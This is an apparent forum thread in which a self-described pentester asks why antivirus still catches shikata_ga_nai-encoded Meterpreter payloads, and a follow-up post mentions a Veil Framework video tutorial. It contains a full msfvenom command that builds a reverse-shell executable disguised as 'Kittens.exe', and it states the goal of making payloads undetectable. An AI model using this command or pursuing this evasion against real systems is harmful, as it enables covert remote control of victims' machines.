Shikata_ga_nai encoder | Not FUD

Hadeus

I've been pentesting on on my Windows 7 VM lately with shikata_ga_nai encoded payloads I've been generating vai Veil-Evasion and msfvenom.

For example, I have been using the windows/meterpreter/reverse_tcp reverse stager to call back to me on my handler on kali and it works BUT thats only when AV is turned off, otherwise my payloads are detected by AV (AVG)

Are shikata_ga_nai signatures now detectable via AV? Or perhaps I'm encoding my payloads wrong?

Here is an example of one of my payloads

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe LHOST=192.168.32.130 LPORT=4444 > Kittens.exe

I currently have a video i finished on using Veil Framework i just need to spend some time adding the voice over to the to go with the video i never got around to it was messing around with my old microphone to see if it would be good to use now or not didn't like the audio turn out so i gotta redo it.

however i have a old video that i did using Veil Framework reason im doing the video over again is because i pronouced the Veil Framework wrong through the whole video.

So i sounded like a complete idiot.

https://www.youtube.com/watch?v=9E5RbzsnJAo